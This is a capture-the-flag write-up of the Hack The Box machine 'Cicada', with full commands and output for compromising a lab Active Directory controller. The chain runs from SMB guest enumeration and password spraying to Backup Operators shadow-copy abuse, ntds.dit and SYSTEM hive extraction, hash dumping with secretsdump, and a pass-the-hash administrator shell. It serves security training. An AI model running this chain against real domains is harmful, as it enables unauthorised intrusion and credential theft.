Cicada is a Windows machine running Active Directory with an open SMB share that contains a default password. Usernames can be enumerated by brute-forcing RIDs, which can then be used to run a password spray, resulting in valid credentials for the user michael.wrightson. This allows for authentication to the LDAP server to obtain AD info, leading to the discovery of another password stored in the description field of the david.orelious user. These credentials grant access to the DEV SMB share, which contains a PowerShell script that reveals the password for the emily.oscars user, a member of Backup Operators. Membership in this group can be leveraged to create a shadow copy of the C drive, providing access to the ntds.dit database and SYSTEM registry hive. These can then be used to extract user NTLM hashes, resulting in a shell as the administrator.
nmap scan:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ nmap -sC -sV -Pn -oA nmap/output 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-05 12:46 EDT
Nmap scan report for 10.10.11.35
Host is up (0.045s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-05 22:05:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 5h19m06s
| smb2-time:
| date: 2025-06-05T22:06:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.60 secondsI added cicada.htb and CICADA-DC.cicada.htb to /etc/hosts. Guest access was enabled on SMB, and the HR share was readable:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server shareI used netexec to spider the shares:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' -M spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 0
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 1.24 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 1.24 KBThe HR share contained the following:
{
"HR": {
"Notice from HR.txt": {
"atime_epoch": "2024-08-28 13:31:48",
"ctime_epoch": "2024-03-14 08:29:03",
"mtime_epoch": "2024-08-28 13:31:48",
"size": "1.24 KB"
}
}
}I added -o download_flag=true to the above netexec command to download the share.
Notice from HR.txt revealed a default password used for new hires:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpGuest access was restricted when using the --users option in netexec to enumerate users:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)However, I was able to enumerate usernames by using the --rid-brute option, which iterates through possible RID values appended to the domain SID; this process identifies valid SIDs and reveals their corresponding account names:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'a' -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)Based on the SidTypeUser accounts from the output, I created a list of usernames:
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscarsI used netexec to run a password spray, which resulted in a valid password for michael.wrightson:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILUREWith valid user credentials, I was able to authenticate to LDAP to get domain info with ldapsearch:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ ldapsearch -x -H ldap://10.10.11.35 -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "dc=cicada,dc=htb" > ldap_outputAfter looking through the output, I found a password in the description field of the david.orelious user:
<...snip...>
# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
<...snip...>These credentials provided access to the DEV share:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server shareI used netexec to spider the shares:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ netexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 33
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 12
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.09 KB
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 23 B
SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 5.22 KBThe DEV share contained the following:
{
"DEV": {
"Backup_script.ps1": {
"atime_epoch": "2024-08-28 13:28:22",
"ctime_epoch": "2024-03-14 08:31:38",
"mtime_epoch": "2024-08-28 13:28:22",
"size": "601 B"
}
},
<...snip...>I downloaded the share by adding -o download_flag=true to the above netexec command.
Backup_script.ps1 revealed the credentials for emily.oscars:
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"Using evil-winrm, I obtained a shell as emily.oscars:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> ls
Directory: C:\Users\emily.oscars.CICADA\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/5/2025 4:22 PM 34 user.txtThis user was a member of Backup Operators:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288Members of the Backup Operators group are granted the SeBackup and SeRestore privileges:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUsers with SeBackupPrivilege can create a shadow copy of the entire drive. This enables traversal of any directory, listing of folder contents, and copying of any file regardless of explicit access rights. This privilege can be exploited to obtain sensitive files such as the ntds.dit database and the SYSTEM registry hive. These files can then be copied locally to extract NTLM hashes with impacket-secretsdump.
The diskshadow.exe utility can be used to create a disk shadow copy, although I couldn't enter commands directly into diskshadow.exe since commands run through evil-winrm execute within the context of the non-interactive wsmprovhost process, indicated by the session ID (SI) of 0:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> $PID
996
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\desktop> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
<...snip...>
3816 29 121000 138444 1.38 996 0 wsmprovhost
<...snip...>diskshadow.exe can also run commands from a script file, enabling non-interactive execution. I created the script (diskshadow.txt) with the following content in C:\windows\temp:
*Evil-WinRM* PS C:\windows\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\windows\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\windows\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\windows\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -appendUsing diskshadow.exe along with diskshadow.txt, I created a shadow copy of the C drive exposed as z:
*Evil-WinRM* PS C:\windows\temp> diskshadow.exe /s c:\windows\temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: CICADA-DC, 6/5/2025 4:31:11 PM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {2092a9c7-6030-4242-ae48-eb9fcebe32e2} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d} set as environment variable.
Querying all shadow copies with the shadow copy set ID {b49ed108-b5d4-4cb0-85b6-7f928242451d}
* Shadow copy ID = {2092a9c7-6030-4242-ae48-eb9fcebe32e2} %temp%
- Shadow copy set: {b49ed108-b5d4-4cb0-85b6-7f928242451d} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 6/5/2025 4:31:12 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {2092a9c7-6030-4242-ae48-eb9fcebe32e2}
The shadow copy was successfully exposed as z:\.
->Next, with the robocopy utility, I made a copy of ntds.dit from z:
*Evil-WinRM* PS C:\windows\temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Thursday, June 5, 2025 4:32:20 PM
Source : z:\Windows\NTDS\
Dest : C:\windows\temp\ntds\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
New Dir 1 z:\Windows\NTDS\
New File 16.0 m ntds.dit
<...snip...>
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 1 0 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 82,646,384 Bytes/sec.
Speed : 4,729.064 MegaBytes/min.
Ended : Thursday, June 5, 2025 4:32:20 PMMembership in the Backup Operators group allows copying registry hives using the reg command. So I used it to copy the SYSTEM hive:
*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.Then, I downloaded ntds.dit and SYSTEM:
*Evil-WinRM* PS C:\windows\temp> download ntds/ntds.dit
Info: Downloading C:\windows\temp\ntds/ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\windows\temp> download SYSTEM
Info: Downloading C:\windows\temp\SYSTEM to SYSTEM
Info: Download successful!Using impacket-secretsdump with ntds.dit and SYSTEM, I was able to extract user NTLM hashes:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
<...snip...>With the hash of the administrator, I obtained a shell over WinRM:
┌──(kali㉿kali)-[~/Desktop/HTB/Cicada]
└─$ evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/5/2025 4:22 PM 34 root.txt